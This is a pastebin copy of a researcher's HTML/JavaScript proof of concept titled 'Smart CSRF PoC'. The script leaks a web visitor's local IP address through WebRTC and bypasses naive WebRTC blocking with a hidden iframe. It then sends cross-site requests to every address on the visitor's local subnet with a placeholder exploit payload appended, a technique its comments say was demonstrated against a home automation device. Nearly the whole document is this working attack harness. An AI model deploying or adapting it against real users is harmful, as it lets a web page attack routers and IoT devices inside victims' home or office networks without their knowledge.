SHOW:
|
|
- or go back to the newest paste.
| 1 | <HTML><TITLE>Smart CSRF PoC</TITLE> | |
| 2 | <!-- | |
| 3 | The MIT License (MIT) | |
| 4 | ||
| 5 | Copyright (c) 2015 Daniel Roesler | |
| 6 | ||
| 7 | Permission is hereby granted, free of charge, to any person obtaining a copy | |
| 8 | of this software and associated documentation files (the "Software"), to deal | |
| 9 | in the Software without restriction, including without limitation the rights | |
| 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| 11 | copies of the Software, and to permit persons to whom the Software is | |
| 12 | furnished to do so, subject to the following conditions: | |
| 13 | ||
| 14 | The above copyright notice and this permission notice shall be included in all | |
| 15 | copies or substantial portions of the Software. | |
| 16 | ||
| 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR | |
| 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, | |
| 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE | |
| 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER | |
| 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, | |
| 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE | |
| 23 | SOFTWARE. | |
| 24 | --> | |
| 25 | <script> | |
| 26 | // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/ | |
| 27 | // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md | |
| 28 | // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request. | |
| 29 | // A version of this script including the payload for a 0-day in a home automation product was demonstrated at: | |
| 30 | // DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion' | |
| 31 | // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server. | |
| 32 | // -- Craig Young, Security Researcher Tripwire VERT | |
| 33 | ||
| 34 | //get the IP addresses associated with an account | |
| 35 | function getIPs(callback){
| |
| 36 | var ip_dups = {};
| |
| 37 | ||
| 38 | //compatibility for firefox and chrome | |
| 39 | var RTCPeerConnection = window.RTCPeerConnection | |
| 40 | || window.mozRTCPeerConnection | |
| 41 | || window.webkitRTCPeerConnection; | |
| 42 | var useWebKit = !!window.webkitRTCPeerConnection; | |
| 43 | ||
| 44 | //bypass naive webrtc blocking using an iframe | |
| 45 | if(!RTCPeerConnection){
| |
| 46 | //NOTE: you need to have an iframe in the page right above the script tag | |
| 47 | // | |
| 48 | //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe> | |
| 49 | //<script>...getIPs called in here... | |
| 50 | // | |
| 51 | var win = iframe.contentWindow; | |
| 52 | RTCPeerConnection = win.RTCPeerConnection | |
| 53 | || win.mozRTCPeerConnection | |
| 54 | || win.webkitRTCPeerConnection; | |
| 55 | useWebKit = !!win.webkitRTCPeerConnection; | |
| 56 | } | |
| 57 | ||
| 58 | //minimal requirements for data connection | |
| 59 | var mediaConstraints = {
| |
| 60 | optional: [{RtpDataChannels: true}]
| |
| 61 | }; | |
| 62 | ||
| 63 | //firefox already has a default stun server in about:config | |
| 64 | // media.peerconnection.default_iceservers = | |
| 65 | // [{"url": "stun:stun.services.mozilla.com"}]
| |
| 66 | var servers = undefined; | |
| 67 | ||
| 68 | //add same stun server for chrome | |
| 69 | if(useWebKit) | |
| 70 | servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
| |
| 71 | ||
| 72 | //construct a new RTCPeerConnection | |
| 73 | var pc = new RTCPeerConnection(servers, mediaConstraints); | |
| 74 | ||
| 75 | function handleCandidate(candidate){
| |
| 76 | //match just the IP address | |
| 77 | var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
| |
| 78 | var ip_addr = ip_regex.exec(candidate)[1]; | |
| 79 | ||
| 80 | //remove duplicates | |
| 81 | if(ip_dups[ip_addr] === undefined) | |
| 82 | callback(ip_addr); | |
| 83 | ||
| 84 | ip_dups[ip_addr] = true; | |
| 85 | } | |
| 86 | ||
| 87 | //listen for candidate events | |
| 88 | pc.onicecandidate = function(ice){
| |
| 89 | ||
| 90 | //skip non-candidate events | |
| 91 | if(ice.candidate) | |
| 92 | handleCandidate(ice.candidate.candidate); | |
| 93 | }; | |
| 94 | ||
| 95 | //create a bogus data channel | |
| 96 | pc.createDataChannel("");
| |
| 97 | ||
| 98 | //create an offer sdp | |
| 99 | pc.createOffer(function(result){
| |
| 100 | ||
| 101 | //trigger the stun server request | |
| 102 | pc.setLocalDescription(result, function(){}, function(){});
| |
| 103 | ||
| 104 | }, function(){});
| |
| 105 | ||
| 106 | //wait for a while to let everything done | |
| 107 | setTimeout(function(){
| |
| 108 | //read candidate info from local description | |
| 109 | var lines = pc.localDescription.sdp.split('\n');
| |
| 110 | ||
| 111 | lines.forEach(function(line){
| |
| 112 | if(line.indexOf('a=candidate:') === 0)
| |
| 113 | handleCandidate(line); | |
| 114 | }); | |
| 115 | }, 1000); | |
| 116 | } | |
| 117 | ||
| 118 | getIPs( | |
| 119 | function(ip){
| |
| 120 | var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./ | |
| 121 | if (local_regex.exec(ip) != null) {
| |
| 122 | var subnet = local_regex.exec(ip)[0]; | |
| 123 | for (node=1; node<256; node++) {
| |
| 124 | var url = 'http://' + subnet + node + exploit_URI_payload; | |
| 125 | var oReq = new XMLHttpRequest(); | |
| 126 | oReq.open("get",url,true)
| |
| 127 | oReq.send(); | |
| 128 | } | |
| 129 | } | |
| 130 | } | |
| 131 | ); | |
| 132 | </script> | |
| 133 | <H1>o0o0o0o0o0o0</H1> | |
| 134 | </HTML> |
